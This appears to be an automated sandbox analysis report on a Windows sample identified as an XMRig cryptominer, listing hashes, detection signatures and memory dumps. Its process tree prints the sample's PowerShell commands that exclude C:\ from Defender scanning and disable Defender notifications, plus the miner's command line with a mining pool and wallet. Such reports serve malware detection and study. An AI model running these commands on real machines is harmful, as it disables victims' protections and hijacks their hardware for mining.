Overview

overview

10

Static

static

3

JaffaCakes...72.exe

windows7-x64

10

JaffaCakes...72.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    24-12-2024 11:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    JaffaCakes118_ae90d6fabc9bea021dcb788a0c5320b0aea8784d8ea0d1dafa90827545ccb372.exe

  • Size

    5.5MB

  • MD5

    ac1db2e5e852112f8a4e8405842a0bb8

  • SHA1

    de44037d60b513ef07d58165304844ca845492eb

  • SHA256

    ae90d6fabc9bea021dcb788a0c5320b0aea8784d8ea0d1dafa90827545ccb372

  • SHA512

    1d0638c28a2383597a3c728b79e3967a9ca4e949ef1709cc1854fb96d3e2c7904e888ad78d8472d8cec2101caf8cd0100a55c2d5575c1e1a04b10836651317fb

  • SSDEEP

    98304:k2im1GVdUS4liwtcr07coc20OBR7diTUcOZWL7QcDoPjhPc8RjAyIKOQoa1:kSwz4liwtZcoc6ldSkK2AyHOQn

Score
10/10
xmrigexecutionminerupx

Malware Config

Signatures

  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 6 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ae90d6fabc9bea021dcb788a0c5320b0aea8784d8ea0d1dafa90827545ccb372.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ae90d6fabc9bea021dcb788a0c5320b0aea8784d8ea0d1dafa90827545ccb372.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2140
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Set-MpPreference -PUAProtection 1
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Add-MpPreference -ExclusionPath C:\
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2580
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications' -Name DisableNotifications -Value 1
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2004
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe --donate-level 0 --max-cpu-usage 60 -o pool.supportxmr.com:3333 -u 49ZMf9zqpebBFbM1oeZChGHGhcuvZReqAiy1n9fq4FcbJeYv3FbGYwfUqsTM7p3CYCN7grTf3PYeYJh5y6YGpK879aJ5Xw8.INTELRIG6
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2672

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    37389ab849d58e74e0c507cf20a2d0dc

    SHA1

    fe26ef98e759ae2d54bdce7be46f47015835048c

    SHA256

    2b3cc6c9f255794136b008e08461fde2feabcc36a62aa37becde68f312dc3ccf

    SHA512

    84d6d22ab06aa2046ac4fa1e95c4df2de64df5e83803e0feb28506b7e3c3cd99e67e81f11f3c801c13681de51b31e4443ee1a8c0c59a76226a44dcd26254a62f

    Download Submit

  • memory/2140-18-0x000007FEF53A0000-0x000007FEF5D8C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2140-36-0x000007FEF53A0000-0x000007FEF5D8C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2140-35-0x000007FEF53A3000-0x000007FEF53A4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2140-0-0x000007FEF53A3000-0x000007FEF53A4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2140-1-0x00000000012A0000-0x0000000001820000-memory.dmp

    Filesize

    5.5MB

    Download

  • memory/2580-16-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2580-17-0x0000000002710000-0x0000000002718000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2672-23-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/2672-19-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/2672-21-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/2672-29-0x0000000000570000-0x0000000000584000-memory.dmp

    Filesize

    80KB

    Download

  • memory/2672-25-0x000007FFFFFDD000-0x000007FFFFFDE000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2672-26-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/2672-31-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/2672-33-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/2672-34-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/2672-32-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/2672-30-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/2672-27-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/2672-28-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download